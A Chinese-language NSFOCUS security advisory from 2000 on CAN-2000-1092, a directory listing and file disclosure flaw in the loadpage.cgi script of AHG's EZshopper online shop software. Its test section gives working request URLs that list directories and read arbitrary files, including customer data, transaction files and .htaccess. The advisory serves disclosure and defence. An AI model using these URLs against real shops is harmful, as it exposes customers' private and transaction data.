首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第16期->最新漏洞
期刊号: 类型: 关键词:
AHG EZshopper loadpage.cgi目录列表泄露漏洞

主页:http://www.nsfocus.com
日期:2000-12-14

受影响的系统:  
  Alex Heiphetz Group EZshopper v.3.0 for Unix
  Alex Heiphetz Group EZshopper v.2.0 for Unix



描述:
--------------------------------------------------------------------------------


CVE CAN ID : CAN-2000-1092

NSFOCUS安全小组发现AHG公司的EZshopper所带的loadpage.cgi存在一个安全漏
洞。攻击者可以获得EZshopper目录的文件列表及其敏感文件内容。

EZshopper是AHG(www.ahg.com)公司开发的一套网上商店系统。它包含一些Perl
脚本。其中有一个CGI程序:loadpage.cgi,它用来打开并显示EZshopper目录下
的HTML文件。

通常的调用格式如下:

EZshopper v3.0:
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=<文件名>
EZshopper v2.0:
http://site/cgi-bin/ezshopper2/loadpage.cgi?+<文件名>

然而,loadpage.cgi没有正确检查用户输入的"文件名"是否真是一个文件。
如果输入的"文件名"是目录名,loadpage.cgi将会返回当前EZshopper目录下的
文件列表。攻击者可以根据返回信息进入子目录或者查看敏感文件(例如,用户
数据文件,交易信息文件,.htaccess等等)的内容。

注意:这个漏洞不能用来查看EZshopper之外的目录,因为新版本的loadpage.cgi
检查了文件名是否包含"../".


<* 来源:NSFOCUS 安全小组 (security@nsfocus.com)
        http://www.nsfocus.com/sa-08.htm
*>




测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



提交下列URL可以看到EZshopper根目录下的文件列表(如果页面显示为空,查看浏览
器中当前页面的源码)。

EZshopper v3.0:
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/

EZshopper v2.0:
http://site/cgi-bin/ezshopper2/loadpage.cgi?id+/

如果想要查看EZshopper子目录的文件列表,可以提交下列URL:

EZshopper v3.0:
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/subdirectory/

EZshopper v2.0:
http://site/cgi-bin/ezshopper2/loadpage.cgi?id+/subdirectory/

在得到文件列表后,攻击者就可以使用下面类似的URL来查看任意文件内容。
http://site/cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=/<目录名>/<文件名>
http://site/cgi-bin/ezshopper2/loadpage.cgi?+/<目录名>/<文件名>




--------------------------------------------------------------------------------
建议:

厂商补丁:

我们于2000年12月4日将此问题通知厂商。AHG已经修复了此漏洞。正在使用有
问题版本的用户请尽快升级到最新版本。

厂商主页:
http://www.ahg.com/

版权所有,未经许可,不得转载